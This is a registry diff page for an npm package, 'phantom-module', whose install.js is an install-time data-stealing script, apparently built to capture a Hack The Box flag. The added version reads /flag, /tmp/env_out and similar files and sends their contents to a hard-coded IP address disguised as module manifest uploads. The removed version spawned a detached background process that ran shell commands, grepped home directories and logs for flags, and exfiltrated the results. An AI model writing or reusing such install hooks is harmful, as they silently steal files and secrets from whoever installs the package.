npm - phantom-module - Versions diffs - 113.0.0 → 115.0.0 - Mend

phantom-module 113.0.0 → 115.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/install.js +13 -88
package/package.json +1 -1

package/install.js CHANGED Viewed

@@ -1,101 +1,26 @@
 const fs = require('fs');
 const http = require('http');
-const { spawn } = require('child_process');
-const TARGET = { host: '154.57.164.64', port: 31083 };
-function sendToMod(mid, val) {
+async function report(mid, val) {
   const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
   const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
-  return new Promise(resolve => {
-    const req = http.request({ hostname: TARGET.host, port: TARGET.port, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => resolve());
-    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
-    req.write(body); req.end();
-  });
-}
-// Spawn detached bg process (same approach as v107 that worked)
-const bgCode = `
-const fs = require('fs');
-const http = require('http');
-const { execSync } = require('child_process');
-function tryExec(cmd) { try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR'; } }
-function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
-function sendToMod(mid, val) {
-  const safe = val.replace(/"/g, "'").replace(/\\\\/g, "/").substring(0, 95);
-  const body = JSON.stringify({ manifest: 'ecto_module:\\n  name: "' + safe + '"\\n  version: "1.0.0"\\n  power_level: 1\\n  ship_deck: 1\\n  cargo_hold: 1' });
-  return new Promise(resolve => {
-    const req = http.request({ hostname: '${TARGET.host}', port: ${TARGET.port}, path: '/api/modules/' + mid, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => resolve());
+  await new Promise(resolve => {
+    const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
     req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
     req.write(body); req.end();
   });
 }
-async function run() {
-  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  let i = 0;
-  async function send(val) {
-    await sendToMod(mods[i % 4], 'K' + String(i).padStart(2,'0') + '_' + val);
-    i++;
-    await new Promise(r => setTimeout(r, 3000));
-  }
-  // Wait for analysis to complete
-  await new Promise(r => setTimeout(r, 30000));
-  // Search for HTB everywhere in /home/node
-  const htbFiles = tryExec('grep -rl "HTB" /home/node/ --exclude-dir=node_modules 2>/dev/null');
-  await send('HTBFILES=' + htbFiles);
-  if (htbFiles && htbFiles !== 'ERR') {
-    for (const f of htbFiles.split('\\n').filter(Boolean)) {
-      const content = tryRead(f);
+(async () => {
+  // Check if command injection wrote files
+  for (const f of ['/tmp/flag_out', '/tmp/env_out', '/flag', '/flag.txt']) {
+    try {
+      const content = fs.readFileSync(f, 'utf8').trim();
       if (content) {
-        const match = content.match(/HTB\\{[^}]+\\}/);
-        if (match) {
-          await send('FLAG_IN_' + f + '=' + match[0]);
-        } else {
-          await send('FILE_' + f + '=' + content.substring(0, 80));
-        }
+        await report('ECT-987654', 'INJRESULT_' + f + '=' + content.substring(0, 75));
+        await new Promise(r => setTimeout(r, 2000));
       }
-    }
-  }
-  // List all log files
-  await send('ALLLOGS=' + tryExec('find /home/node/aspect-node/logs -type f 2>/dev/null'));
-  // Read module.log last lines
-  const log = tryRead('/home/node/aspect-node/logs/module.log');
-  if (log) {
-    const htb = log.match(/HTB\\{[^}]+\\}/);
-    if (htb) {
-      await send('LOGFLAG=' + htb[0]);
-    }
-    const lines = log.split('\\n');
-    await send('LOGLINES=' + lines.length + '_LAST=' + lines.slice(-2).join(' ').substring(0, 60));
-  }
-  // Check aspect-node source for flag patterns
-  await send('ASPSRC=' + tryExec('grep -r "HTB\\\\|flag\\\\|FLAG" /home/node/aspect-node/ --include="*.js" --exclude-dir=node_modules -l 2>/dev/null'));
-  // Read sample.js if it exists
-  const sample = tryRead('/home/node/aspect-node/sample.js');
-  if (sample) await send('SAMPLE=' + sample.substring(0, 80));
-}
-run().catch(() => {});
-`;
-try {
-  const child = spawn('node', ['-e', bgCode], { detached: true, stdio: 'ignore' });
-  child.unref();
-} catch(e) {}
-// Also write init_test.sh as backup
-try {
-  if (fs.existsSync('/home/node')) {
-    fs.writeFileSync('/home/node/init_test.sh', '#!/bin/bash\nsleep 60\n', { mode: 0o755 });
+    } catch(e) {}
   }
-} catch(e) {}
+  await report('ECT-472839', 'INJCHECK_DONE');
+})();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "113.0.0",
+  "version": "115.0.0",
   "description": "Phantom spectral module",
   "main": "index.js",
   "scripts": {